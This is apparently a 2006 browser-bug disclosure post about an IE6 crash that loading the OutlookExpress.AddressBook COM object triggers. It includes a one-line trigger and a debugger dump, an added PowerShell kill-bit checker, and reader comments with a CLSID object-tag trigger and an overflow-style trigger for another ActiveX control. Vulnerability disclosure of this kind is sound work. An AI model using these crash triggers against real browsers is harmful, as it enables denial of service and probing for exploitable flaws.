MoBB #3: OutlookExpress.AddressBook
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. It appears to have been resolved (via killbit) in a recent update to Windows XP SP2. This bug is one of many that are triggered by loading a non-ActiveX COM object from inside Internet Explorer.
a = new ActiveXControl('OutlookExpress.AddressBook');
Demonstration
eax=00000000 ebx=06622008 ecx=00000002
edx=065814e4 esi=00000000 edi=00000000
eip=0648b2f5 esp=0012a734 ebp=0012a754
msoe!IDwGetOption+0x78:
0648b2f5 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference.
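As an added example (not part of the original post or its comments), the PowerShell below checks whether the kill bit mentioned above is set for the ProgID in the post and for the two CLSIDs quoted in the comments. The function names Resolve-Clsid and Get-KillBitStatus are hypothetical, and PowerShell 3.0 or later on the audited machine is assumed.

```powershell
# Added example (not from the original post). The kill bit is bit 0x400 of the
# "Compatibility Flags" DWORD under ...\ActiveX Compatibility\{CLSID}.
$KillBit = 0x400
$CompatRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    # Registry view used by 32-bit IE on 64-bit Windows
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

# Hypothetical helper: accept a CLSID (braced or bare) or a ProgID.
function Resolve-Clsid([string]$Name) {
    $guid = [guid]::Empty
    if ([guid]::TryParse($Name, [ref]$guid)) {
        return '{' + $guid.ToString().ToUpper() + '}'
    }
    $key = "Registry::HKEY_CLASSES_ROOT\$Name\CLSID"
    if (Test-Path -LiteralPath $key) {
        return ([string](Get-ItemProperty -LiteralPath $key).'(default)').ToUpper()
    }
    return $null  # ProgID is not registered on this machine
}

# Hypothetical helper: one result row per name and registry view.
function Get-KillBitStatus([string[]]$Name) {
    foreach ($n in $Name) {
        $clsid = Resolve-Clsid $n
        foreach ($root in $CompatRoots) {
            if (-not (Test-Path -LiteralPath $root)) { continue }
            $flags = $null
            if ($clsid) {
                $entry = Get-ItemProperty -LiteralPath "$root\$clsid" -ErrorAction SilentlyContinue
                if ($entry) { $flags = $entry.'Compatibility Flags' }
            }
            [pscustomobject]@{
                Name   = $n
                Clsid  = $clsid
                View   = if ($root -like '*Wow6432Node*') { '32-bit' } else { 'native' }
                Flags  = if ($null -ne $flags) { '0x{0:X8}' -f $flags } else { '(none)' }
                Killed = ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)
            }
        }
    }
}

# ProgID from the post, followed by the two CLSIDs quoted in the comments.
Get-KillBitStatus 'OutlookExpress.AddressBook',
    '233A9694-667E-11d1-9DFB-006097D50408',
    '273380E8-1438-4B2C-95B0-713284FBC302' | Format-Table -AutoSize
```

Killed is True only when the entry exists and bit 0x400 is set; a row showing "(none)" means no Compatibility Flags value was found for that class in that registry view.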
3 Comments:
Hello hdm,
This flaw has been known since March 2005 (discovered by Shane Hird):
http://www.securityfocus.com/archive/1/391803
You can replace "OutlookExpress.AddressBook" with its clsid "233A9694-667E-11d1-9DFB-006097D50408":
[object classid="clsid:233A9694-667E-11d1-9DFB-006097D50408"][/object]
However, very good work :-)
Good to know, thanks for the comment! A quick search of the COM name (but not the CLSID) didn't turn this up. Looks like the killbit has finally been enabled.
Regards,
Nice finds with the Browser bugs. I came across this one while playing with System information ActiveX:
classid="clsid:273380E8-1438-4B2C-95B0-713284FBC302"
filename = String(1, "A")
computer = String(1234, "BIG AND SCARY")
category = String(1, "A")
victim.SaveFile filename, computer, category
I can't paste html so here it is in full: http://noderat.spaces.msn.com/blog/cns!6ADE4614B66EADD2!1150.entry
regards
c0ntex